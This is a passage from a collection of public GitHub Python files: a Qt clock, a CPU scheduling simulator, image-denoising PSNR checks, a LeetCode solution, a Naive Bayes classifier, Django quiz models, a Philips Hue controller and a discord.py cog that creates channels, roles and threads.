QPoint(-7, 8),\n QPoint(0, -40)\n ])\n\n minuteHand = QPolygon([\n QPoint(7, 8),\n QPoint(-7, 8),\n QPoint(0, -70)\n ])\n\n hourColor = QColor(255, 0, 127)\n minuteColor = QColor(0, 127, 127, 255)\n\n def __init__(self, parent=None):\n QWidget.__init__(self)\n\n timer = QTimer(self)\n timer.timeout.connect(self.update)\n timer.start(1000)\n\n self.setWindowTitle(\"Analog Clock\")\n self.resize(200, 200)\n\n def paintEvent(self, event):\n side = min(self.width(), self.height())\n time = QTime.currentTime()\n\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing)\n painter.translate(self.width() / 2, self.height() / 2)\n painter.scale(side / 200.0, side / 200.0)\n\n painter.setPen(Qt.NoPen)\n painter.setBrush(AnalogClock.hourColor)\n\n painter.save()\n painter.rotate(30.0 * ((time.hour() + time.minute() / 60.0)))\n painter.drawConvexPolygon(AnalogClock.hourHand)\n painter.restore()\n\n painter.setPen(AnalogClock.hourColor)\n\n for i in range(12):\n painter.drawLine(88, 0, 96, 0)\n painter.rotate(30.0)\n\n painter.setPen(Qt.NoPen)\n painter.setBrush(AnalogClock.minuteColor)\n\n painter.save()\n painter.rotate(6.0 * (time.minute() + time.second() / 60.0))\n painter.drawConvexPolygon(AnalogClock.minuteHand)\n painter.restore()\n\n painter.setPen(AnalogClock.minuteColor)\n\n for j in range(60):\n if (j % 5) != 0:\n painter.drawLine(92, 0, 96, 0)\n painter.rotate(6.0)\n\nif __name__ =='__main__':\n # Exception Handling\n try:\n myApp = QApplication(sys.argv)\n myClock = AnalogClock()\n myClock.show()\n myApp.exec_()\n sys.exit(0)\n except NameError:\n print(\"Name Error:\", sys.exc_info()[1])\n except SystemExit:\n print(\"Closing Window...\")\n except Exception:\n print(sys.exc_info()[1])\n","repo_name":"j2doll/Learning-Qt-for-Python","sub_path":"PSGUIAD/5/Ch5_6.py","file_name":"Ch5_6.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"24100481938","text":"import os\nimport pickle\n\ndic={}\nf=open('project1_result2.txt')\nfor root, dirs, files in os.walk('NYT'):\n for fname in files:\n content=f.readline()\n print(fname, content)\n dic[fname]=content\n\nf.close()\n\n\nwith open(\"transformer.pickle\",\"wb\") as fw:\n pickle.dump(dic, fw)\n","repo_name":"saga9017/laboratory","sub_path":"project1/sample3.py","file_name":"sample3.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"10515774757","text":"# /*\r\n# ALGOS\r\n# 1. First-Come First-Served (FCFS) - non pre\r\n# -the ready que will update as processes come in and out based on fcfs\r\n# 2. Shortest Remaining Time First (SRTF) - pre-emptive\r\n# -the ready que update dynaically as processes come in and update to allow\r\n# -the srtf prioraty\r\n# 3. Highest Response Ratio Next (HRRN) - non pre\r\n# -\r\n# 4. Round Robin, with different quantum values (RR)\r\n#\r\n# METRICS\r\n# for each lambda value\r\n# The average turnaround time\r\n# The total throughput (number of processes done per unit time)\r\n# The CPU utilization\r\n# The average number of processes in the ready queue\r\n# single plot for each method based on\r\n# */\r\nimport random\r\nimport math\r\nfrom sys import argv\r\nfrom Event import Event\r\nfrom operator import attrgetter\r\nimport matplotlib.pyplot as plt\r\n\r\ndef genexp(l):\r\n x = 0\r\n while(x==0):\r\n u = random.random()\r\n x = (-1/l)*math.log(u)\r\n return(x)\r\n\r\ndef departIndex(list):\r\n for i in range(len(list)):\r\n if (list[i].getType == 2):\r\n return i\r\n\r\n\r\nclass Sim():\r\n def __init__(self, algo, lam, qv):\r\n self.events = []\r\n self.rq = []\r\n self.clock = 0.0\r\n self.algorithm = algo\r\n self.lam = 10.0 + lam\r\n self.avgST = .04\r\n self.qv = qv\r\n self.cpuIdle = 1 #1 = true, 0 = false\r\n self.endCondition = 0\r\n self.arrivalTime = []\r\n self.processTime = []\r\n self.pID = 0\r\n self.turnaroundTimes = []\r\n self.cpuUseTime = 0.0\r\n self.startUse = 0.0\r\n self.stopUse = 0.0\r\n self.totalQue = 0\r\n\r\n\r\n def init(self):\r\n previousEventTime = 0\r\n for i in range(10000):\r\n self.arrivalTime.append((genexp(self.lam)) + previousEventTime)\r\n previousEventTime = self.arrivalTime[i]\r\n self.processTime.append(genexp(1/self.avgST))\r\n self.events.append(Event(0, self.processTime[0], 1, 0))\r\n\r\n def scheduleEvent(self,type,eve):\r\n if (type == 1):\r\n self.events.append(eve)\r\n elif (type == 2):\r\n eve.setRequestTime(self.clock+eve.getTimeRemaining())\r\n eve.setType(2)\r\n self.events.append(eve)\r\n elif (type == 3):\r\n eve.setRequestTime(self.clock+self.qv)\r\n eve.setTimeRemaining(eve.getTimeRemaining()-self.qv)\r\n eve.setType(3)\r\n self.events.append(eve)\r\n #time slice event\r\n\r\n def arrival(self,event):\r\n if (self.algorithm == 1):\r\n if (self.cpuIdle == 1):\r\n self.cpuIdle = 0\r\n self.startUse = self.clock\r\n print(\"cpu starting, event: \" + str(event.getID()) + \" add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n print(\"cpu in use, added event: \" + str(event.getID()) + \" to ready que\")\r\n self.rq.append(event)\r\n self.totalQue = 1 + self.totalQue\r\n elif (self.algorithm == 2):\r\n if (self.cpuIdle == 1):\r\n self.cpuIdle = 0\r\n self.startUse = self.clock\r\n ##print(\"cpu starting, event add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n ##print(\"An interupt has occured\")\r\n index = departIndex(self.events)\r\n self.events[index].setTimeRemaining(self.events[index].getTimeRemaining()-self.clock)\r\n for i in range(len(self.events)):\r\n temp = self.events[i]\r\n self.rq.append(temp)\r\n self.events.pop(index)\r\n self.rq = self.rq = sorted(self.rq,key=attrgetter('timeRemaining'))\r\n temp = self.rq[0]\r\n self.scheduleEvent(2,temp)\r\n self.rq.pop(0)\r\n self.totalQue = 1 + self.totalQue\r\n elif (self.algorithm == 3):\r\n if (self.cpuIdle == 1):\r\n self.cpuIdle = 0\r\n self.startUse = self.clock\r\n #print(\"cpu starting, event add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n #print(\"cpu running, new event added to rq\")\r\n self.totalQue = 1 + self.totalQue\r\n self.rq.append(event)\r\n elif (self.algorithm == 4):\r\n if (self.cpuIdle == 1):\r\n self.cpuIdle == 0\r\n self.startUse = self.clock\r\n if(event.getTimeRemaining() < self.qv):\r\n ##print(\"cpu starting, event add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n ##print(\"cpu starting, event add to ts\")\r\n self.scheduleEvent(3,event)\r\n else:\r\n ##print(\"cpu running, new event added to rq\")\r\n self.totalQue = 1 + self.totalQue\r\n self.rq.append(event)\r\n\r\n def depart(self):\r\n if (self.algorithm == 1):\r\n if (len(self.rq)==0):\r\n self.cpuIdle = 1\r\n self.stopUse = self.clock\r\n self.cpuUseTime = (self.stopUse - self.startUse) + self.cpuUseTime\r\n print(\"cpu idle, nothing in rq\")\r\n else:\r\n print(\"cpu in use, depart occuring, scheduled: \"+ str(self.rq[0].getID()) +\" as next depart\")\r\n temp = self.rq[0]\r\n self.scheduleEvent(2,temp)\r\n self.rq.pop(0)\r\n elif (self.algorithm == 2):\r\n #for a depart if there is stuff in ready que then\r\n #sort by shortest time remaining\r\n if (len(self.rq) == 0):\r\n self.cpuIdle = 1\r\n self.stopUse = clock\r\n self.cpuUseTime = (self.stopUse - self.startUse) + self.cpuUseTime\r\n #print(\"cpu idle, nothing in rq\")\r\n else:\r\n #print(\"new process, cpu still running, scheduled process depart\")\r\n self.rq = sorted(self.rq,key=attrgetter('timeRemaining'))\r\n temp = self.rq[0]\r\n self.scheduleEvent(2,temp)\r\n self.rq.pop(0)\r\n self.totalQue = 1 + self.totalQue\r\n elif (self.algorithm == 3):\r\n if (len(self.rq) == 0):\r\n self.cpuIdle = 1\r\n self.stopUse = clock\r\n self.cpuUseTime = (self.stopUse - self.startUse) + self.cpuUseTime\r\n #print(\"cpu idle, nothing in rq\")\r\n else:\r\n #print(\"process from rq, cpu still running, scheduled depart\")\r\n for i in range(len(self.rq)):\r\n self.rq[i].setWT(self.rq[i].getRequestTime() - self.clock)\r\n self.rq[i].setRR((self.rq[i].getWaitTime() + self.rq[i].getTimeRemaining())/self.rq[i].getTimeRemaining())\r\n self.rq = sorted(self.rq,key=attrgetter('responseRatio'),reverse=True)\r\n self.scheduleEvent(2,self.rq[0])\r\n self.rq.pop(0)\r\n self.totalQue = 1 + self.totalQue\r\n elif (self.algorithm == 4):\r\n if (len(self.rq) == 0):\r\n self.cpuIdle = 1\r\n self.stopUse = clock\r\n self.cpuUseTime = (self.stopUse - self.startUse) + self.cpuUseTime\r\n ##print(\"cpu idle, nothing in rq\")\r\n else:\r\n ##print(\"process from rq, cpu still running, scheduled depart\")\r\n self.rq[0].setRequestTime(clock)\r\n event = self.rq[0]\r\n self.totalQue = 1 + self.totalQue\r\n if(self.rq.getTimeRemaining() < self.qv):\r\n ##print(\"cpu running, rq event add to depart\")\r\n self.scheduleEvent(2,event)\r\n self.rq.pop(0)\r\n else:\r\n ##print(\"cpu running, rq event add to ts\")\r\n self.scheduleEvent(3,event)\r\n self.rq.pop(0)\r\n\r\n def timeSlice(self, event):\r\n if (len(self.rq)==0):\r\n if(event.getTimeRemaining() < self.qv):\r\n ##print(\"cpu running, ts add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n ##print(\"cpu running, ts add to ts\")\r\n self.scheduleEvent(3,event)\r\n else:\r\n if(self.rq[0].getRequestTime() < self.clock):\r\n if(self.rq[0].getTimeRemaining() < self.qv):\r\n #print(\"cpu running, rq add to depart\")\r\n self.rq[0].setRequestTime(self.clock)\r\n self.scheduleEvent(2,self.rq)\r\n else:\r\n #print(\"cpu running, rq add to ts\")\r\n self.rq[0].setRequestTime(self.clock)\r\n self.scheduleEvent(3,self.rq)\r\n self.totalQue = 1 + self.totalQue\r\n self.rq.append(event)\r\n self.rq.pop(0)\r\n else:\r\n if(event.getTimeRemaining() < self.qv):\r\n #print(\"cpu running, ts add to depart\")\r\n self.scheduleEvent(2,event)\r\n else:\r\n #print(\"cpu running, ts add to ts\")\r\n self.scheduleEvent(3,event)\r\n\r\n def runSim(self):\r\n while(self.endCondition != 10000):\r\n eve = self.events[0]\r\n #print(\"Event to process: \" + str(eve.getID()))\r\n self.clock = eve.getRequestTime()\r\n\r\n if (eve.getType() == 1):\r\n self.arrival(eve)\r\n elif(eve.getType() == 2):\r\n self.turnaroundTimes.append(eve.getTurnAroundTime())\r\n self.depart()\r\n self.endCondition = self.endCondition + 1\r\n #print(\"Processes completed: \" + str(self.endCondition))\r\n elif(eve.getType() == 3):\r\n self.timeSlice(eve)\r\n\r\n self.events.pop(0)\r\n if (self.pID != 9999):\r\n self.pID = self.pID + 1\r\n nextEve = Event((self.arrivalTime[self.pID]), self.processTime[self.pID],1,self.pID)\r\n self.scheduleEvent(1,nextEve)\r\n\r\n self.events = sorted(self.events,key=attrgetter('requestTime'))\r\n\r\n def metrics(self, turnList, throughList, cpuList, queList):\r\n turnList.append(sum(self.turnaroundTimes)/10000)\r\n throughList.append(10000/self.clock)\r\n cpuList.append((self.cpuUseTime/self.clock)*100)\r\n queList.append(self.totalQue/self.clock)\r\n\r\n################################################################################\r\n\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#FCFS\r\nfor i in range (21):\r\n print(\"FCFS\" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.01)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('FCFS Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#need to print graphs to file after interation\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#SRTF\r\nfor i in range (21):\r\n print(\"SRTF\" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.01)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('SRTF Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#HRRN\r\nfor i in range (21):\r\n print(\"HRRN\" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.01)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('HRRN Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#RR - .01 qv\r\nfor i in range (21):\r\n print(\"RR - .01 \" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.01)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('RR - .01 Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\nturnTimes = []\r\nthroughTimes = []\r\ncpuUtilTimes = []\r\navgQueTimes = []\r\nlamValues = []\r\n#RR - .2\r\nfor i in range (21):\r\n print(\"RR - .2 \" + str(i))\r\n lamValues.append(10+i)\r\n sim = Sim(1,i,.2)\r\n sim.init()\r\n sim.runSim()\r\n sim.metrics(turnTimes,throughTimes,cpuUtilTimes,avgQueTimes)\r\n\r\nplt.plot(lamValues, turnTimes, label = \"Turn Around Average\")\r\nplt.plot(lamValues, throughTimes, label = \"Through Put (Processes Per Second)\")\r\nplt.plot(lamValues, cpuUtilTimes, label = \"CPU Util %\")\r\nplt.plot(lamValues, avgQueTimes, label = \"Average Que Size\")\r\n\r\nplt.xlabel('Lambda Values')\r\nplt.ylabel('RR - .2 Values')\r\n\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"PhilipCesani/Operating_Systems_Schedule_Simulator","sub_path":"sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":13909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71820750397","text":"import numpy as np\nimport matplotlib.pylab as plt\nfrom scipy.ndimage import gaussian_filter\nfrom skimage.transform import resize\nfrom scipy import ndimage\nimport imageio\n\ndef psnr(clean, img):\n img = img\n clean = clean\n mse = np.mean((clean-img)**2)\n if mse == 0:\n return 100\n PIXEL_MAX = 1\n return 20 * np.log10(PIXEL_MAX/np.sqrt(mse))\n\n\ninput_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Input/Set14/'\nnoisy_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Input/GaussianNoise/'\noutput_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Output/Paint2image/'\nfiltered_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Input/Filtered/'\nNLmeans_path = 'C:/Files/M2 MVA/S1/Object recognition/Project/SinGAN-master/Input/NLmeans/Gaussian/'\n\n\n#### Clean image\nimage = imageio.imread(input_path+\"bridge.png\")/255\nplt.imshow(image)\nplt.show()\n\n#### Noisy image\nnoisy = imageio.imread(noisy_path+'sigma=30-bridge.png')/255\nnoisy = resize(noisy, image.shape, mode='reflect')\nplt.imshow(noisy)\nplt.show()\nprint(\"Noisy image PSNR\", psnr(image, noisy))\n\n\n#### SinGAN result\n#output = imageio.imread(output_path+'NL-sigma=30-lenna/sigma=30-lenna_out/start_scale=7.png')/255\noutput = imageio.imread(output_path+'f-sigma=30-bridge/start_scale=8.png')/255\noutput = resize(output, image.shape, mode='reflect')\nplt.imshow(output)\nplt.show()\nprint(\"sinGAN Denoised image PSNR\", psnr(image, output))\n\n\n### Median filter\nfiltered = imageio.imread(filtered_path+\"f-sigma=30-bridge.png\")/255\nfiltered = resize(filtered, image.shape, mode='reflect')\nprint(\"Median-Filter denoised image PSNR\", psnr(image, filtered))\nplt.imshow(filtered)\nplt.show()\n\n\n#### NLmeans\nNLmeans_denoised = imageio.imread(NLmeans_path+\"NL-sigma=30-barbara.png\")/255\nNLmeans_denoised = resize(NLmeans_denoised, image.shape, mode='reflect')\nprint(\"NLmeans denoised image PSNR\", psnr(image, NLmeans_denoised))\nplt.imshow(NLmeans_denoised)\nplt.show()\n","repo_name":"Amrou7/Sin-GAN-master","sub_path":"PSRN.py","file_name":"PSRN.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"21752265271","text":"class Solution:\n def isInterleave_recur(self, s1, s2, s3):\n \"\"\"\n :type s1: str\n :type s2: str\n :type s3: str\n :rtype: bool\n \"\"\"\n len1 = len(s1)\n len2 = len(s2)\n len3 = len(s3)\n if len1==0 and len2==0 and len3==0:\n return True\n\n\n if len1>0 and len2>0 and s1[0] == s2[0]:\n if len3>0 and s1[0] == s3[0]:\n return self.isInterleave(s1[1:],s2,s3[1:]) or \\\n self.isInterleave(s1,s2[1:],s3[1:])\n else:\n return False\n else:\n if len1 >0 and len3>0 and s1[0] == s3[0]:\n return self.isInterleave(s1[1:],s2,s3[1:])\n elif len2>0 and len3>0 and s2[0] == s3[0]:\n return self.isInterleave(s1,s2[1:],s3[1:])\n else:\n return False\n\n\n def isInterleave(self, s1, s2, s3):\n \"\"\"\n :type s1: str\n :type s2: str\n :type s3: str\n :rtype: bool\n \"\"\"\n len1 = len(s1)\n len2 = len(s2)\n len3 = len(s3)\n\n dp = [[False for j in range(len2+1)] for i in range(len1+1)]\n if s3[0] == s1[0]:\n dp[1][0] = True\n if s3[0] == s2[0]:\n dp[0][1] = True\n\n for i3 in range(1, len3):\n for i1 in range(0,i3+1):\n if i1 <=len1 and i3-i1<= len2 and dp[i1][i3-i1]:\n print(i1, i3-i1)\n if i1 < len1 and s1[i1] == s3[i3]:\n dp[i1+1][i3-i1] = True\n if i3-i1 < len2 and s2[i3-i1] == s3[i3]:\n dp[i1][i3-i1+1] = True\n\n \n return dp[len1][len2]\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nsol = Solution()\n\ns1 = \"bbbbbabbbbabaababaaaabbababbaaabbabbaaabaaaaababbbababbbbbabbbbababbabaabababbbaabababababbbaaababaa\"\ns2 = \"babaaaabbababbbabbbbaabaabbaabbbbaabaaabaababaaaabaaabbaaabaaaabaabaabbbbbbbbbbbabaaabbababbabbabaab\"\ns3 = \"babbbabbbaaabbababbbbababaabbabaabaaabbbbabbbaaabbbaaaaabbbbaabbaaabababbaaaaaabababbababaababbababbbababbbbaaaabaabbabbaaaaabbabbaaaabbbaabaaabaababaababbaaabbbbbabbbbaabbabaabbbbabaaabbababbabbabbab\"\n\n\n# s1 = \"aabccc\"\n# s2 = \"dbbca\"\n# s3 =\"aadbbcbcacc\"\nprint(sol.isInterleave(s1,s2,s3))\n\n","repo_name":"guodafeng/pythondev","sub_path":"algorithm/leetcode/97.py","file_name":"97.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33236117368","text":"from utils import tokenize, load_curpus\nimport numpy as np\nimport pandas as pd\nimport warnings\nimport time\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn import metrics\n\nwarnings.filterwarnings(\"ignore\")\n\n\nstart = time.clock()\n\nsentiment_vocab = ['agreeable', 'believable', 'good', 'hated', 'sad', 'worried', 'objective']\nfor the_emotion in sentiment_vocab: #循环训练7个情感\n train_data = load_curpus(\"data/\" + the_emotion + \"/train.txt\")\n test_data = load_curpus(\"data/\" + the_emotion + \"/test.txt\")\n # print(train_data)\n train_df = pd.DataFrame(train_data, columns=[\"content\", \"sentiment\"])\n# print(train_df)\n test_df = pd.DataFrame(test_data, columns=[\"content\", \"sentiment\"])\n\n stopwords = []\n with open(\"stopwords.txt\", \"r\", encoding=\"utf8\") as f:\n for w in f:\n stopwords.append(w.strip())\n\n data_str = [\" \".join(content) for content, sentiment in train_data] + \\\n [\" \".join(content) for content, sentiment in test_data]\n vectorizer = CountVectorizer(token_pattern='\\[?\\w+\\]?', stop_words=stopwords)\n vectorizer.fit_transform(data_str)\n\n X_data, y_data = [], []\n for content, sentiment in train_data:\n X, y = [], sentiment\n X_data.append(\" \".join(content))\n y_data.append(sentiment)\n X_train = vectorizer.transform(X_data)\n y_train = y_data\n\n X_data, y_data = [], []\n for content, sentiment in test_data:\n X, y = [], sentiment\n X_data.append(\" \".join(content))\n y_data.append(sentiment)\n X_test = vectorizer.transform(X_data)\n y_test = y_data\n\n\n\n clf = MultinomialNB()\n clf.fit(X_train, y_train)\n\n result = clf.predict(X_test)\n\n\n\n print(metrics.classification_report(y_test, result))\n print('训练', the_emotion)\n print(\"准确率:\", metrics.accuracy_score(y_test, result))\n\nelapsed = (time.clock() - start)\nprint(\"Time used:\",elapsed)\n\n\n\n","repo_name":"lyeXzot/News_emotion_classify","sub_path":"NN&LSTM&NB/NB.py","file_name":"NB.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32460445056","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\n# from student.models import Student\n\n\nclass Test(models.Model):\n name_test = models.CharField(max_length=48)\n\n created = models.DateTimeField(auto_now_add=True, auto_now=False, null=True)\n updated = models.DateTimeField(auto_now_add=False, auto_now=True, null=True)\n\n def __str__(self):\n return \"%s\" % self.name_test\n\n class Meta:\n verbose_name = \"Тест\"\n verbose_name_plural = \"Тесты\"\n\n\nclass Question(models.Model):\n test = models.ForeignKey(Test, blank=True, null=True, default=None, on_delete=models.CASCADE)\n question_text = models.CharField(max_length=256)\n\n def __str__(self):\n return \"%s\" % self.question_text\n\n class Meta:\n verbose_name = \"Вопрос\"\n verbose_name_plural = \"Вопросы\"\n\n\nclass QuestImage(models.Model):\n quest = models.ForeignKey(Question, blank=True, null=True, default=None, on_delete=models.CASCADE)\n image = models.ImageField(upload_to='quest_images/', default=None)\n\n created = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n def __str__(self):\n return \"%s\" % self.id\n\n class Meta:\n verbose_name = 'Картинка вопроса'\n verbose_name_plural = 'Картинки вопроса'\n\n\nclass Answer(models.Model):\n answer_text = models.CharField(max_length=256)\n image = models.ImageField(upload_to='answer_images/', default=None, null=True, blank=True)\n quest = models.ForeignKey(Question, blank=True, null=True, default=None, on_delete=models.CASCADE)\n status = models.BooleanField(null=False, blank=False, default=False)\n\n def __str__(self):\n return self.answer_text\n\n class Meta:\n verbose_name = \"Ответ\"\n verbose_name_plural = \"Ответы\"\n\n\nclass Result(models.Model):\n name = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, default=None)\n test = models.ForeignKey(Test, blank=True, null=True, default=None, on_delete=models.CASCADE)\n total_mark = models.DecimalField(max_digits=3, decimal_places=0, default=2)\n\n created = models.DateTimeField(auto_now_add=True, auto_now=False, null=True)\n updated = models.DateTimeField(auto_now_add=False, auto_now=True, null=True)\n\n def __str__(self):\n return self.name.username\n\n class Meta:\n verbose_name = \"Результаты теста\"\n verbose_name_plural = \"Результаты тестов\"\n\n\nclass AnswerStudent(models.Model):\n name = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, default=None)\n test = models.ForeignKey(Test, blank=True, null=True, default=None, on_delete=models.CASCADE)\n quest = models.ForeignKey(Question, blank=True, null=True, default=None, on_delete=models.CASCADE)\n answer = models.ForeignKey(Answer, blank=True, null=True, default=None, on_delete=models.CASCADE)\n status = models.BooleanField(null=False, blank=False, default=False)\n session_key = models.CharField(max_length=128, blank=True, null=True, default=None)\n\n def __str__(self):\n return self.name.username\n\n class Meta:\n verbose_name = \"Ответ студента\"\n verbose_name_plural = \"Ответы студентов\"\n","repo_name":"WebZ70/WebSystemsVer1","sub_path":"module_test/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15227853232","text":"import qhue\nimport sys\n\ndef add_args(parser):\n parser.add_argument('--hue-username', metavar='USERNAME', dest='hue_username', type=str,\n help='the username to use when connecting to the bridge')\n parser.add_argument('--hue-lights', metavar='ARRAY', dest='hue_lights', type=str, default=\"1\",\n help='the light(s) to change')\n\n\ndef get_target(args):\n if not args.hue_username and args.hue:\n print(\"Need to create the username\")\n from qhue import create_new_username\n username = create_new_username(args.hue)\n print(\"Add '--hue-username %s' to the command line and restart\" % username)\n sys.exit(0)\n print(\"Will control Philips Hue @ %s\" % args.hue)\n b = qhue.Bridge(args.hue, args.hue_username)\n lights = list(map(int, args.hue_lights.split(',')))\n def set_lights(inProgress, failed):\n bri = 127\n alert = \"select\"\n if not failed:\n hue = 25500\n else:\n hue = 0\n bri = 255\n if inProgress:\n alert = \"lselect\"\n #for light in lights:\n # b.lights[light].state(bri=bri//2, hue=hue, alert=\"none\")\n for light in lights:\n b.lights[light].state(bri=bri, hue=hue, alert=alert)\n return set_lights\n","repo_name":"rickardp/devops-buildlight","sub_path":"target_hue.py","file_name":"target_hue.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"1112368705","text":"from discord.ext import commands\nimport discord\nfrom discord.ext.commands import has_permissions\nfrom discord import ChannelType\n\nclass new(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.group()\n async def new(self, ctx):\n if ctx.subcommand_passed is None:\n await ctx.send('Proper Usage: `new [category/channel/role/thread]`')\n elif ctx.invoked_subcommand is None:\n await ctx.send('not an option')\n \n @new.command(name = 'category')\n @commands.guild_only()\n @has_permissions(manage_guild = True)\n async def new_category_subcommand(self, ctx, *, name: str = None):\n if name == None:\n await ctx.send('i need a name for the category')\n return\n \n try:\n category = await ctx.guild.create_category(name = name)\n await ctx.send(f'Category: `{category.name}` created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n \n @new.command(name = 'channel')\n @commands.guild_only()\n @has_permissions(manage_channels = True)\n async def new_channel_subcommand(self, ctx, category: discord.CategoryChannel = None, *, name: str = None):\n if category == None:\n await ctx.send('give me a category to create the channel in')\n return\n\n if name == None:\n await ctx.send('i need a name for the channel')\n return\n\n try:\n channel = await ctx.guild.create_text_channel(name = name, category = category)\n await ctx.send(f'Channel: `{channel.name}` created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n\n @new.command(name = 'role')\n @commands.guild_only()\n @has_permissions(manage_roles = True)\n async def new_role_subcommand(self, ctx, *, name: str = None):\n if name == None:\n await ctx.send('i need a name for this role')\n return\n\n try:\n await ctx.guild.create_role(name = name)\n await ctx.send(f'Role `{name}` created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n\n @new.command(name = 'thread')\n @commands.guild_only()\n @has_permissions(create_public_threads = True, create_private_threads = True)\n async def new_thread_subcommand(self, ctx, channel: discord.TextChannel = None, *, name: str = None):\n if channel == None:\n await ctx.send('i need a channel to create a thread in')\n return\n \n if name == None:\n await ctx.send('i need a name for this thread')\n return\n \n await ctx.send('do you want a `private` or a `public` thread?')\n msg = await self.bot.wait_for('message', check = lambda m: m.author == ctx.author)\n\n if msg.content.lower() == 'public':\n try:\n await channel.create_thread(name = name, type = ChannelType.public_thread)\n await ctx.send(f'Thread `{name}` Created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n elif msg.content.lower() == 'private':\n try:\n await channel.create_thread(name = name, type = ChannelType.private_thread)\n await ctx.send(f'Thread `{name}` Created!')\n except Exception:\n await ctx.send('you made an error somewhere')\n else:\n await ctx.send('that\\'s not an option')\n\n @new_category_subcommand.error\n async def 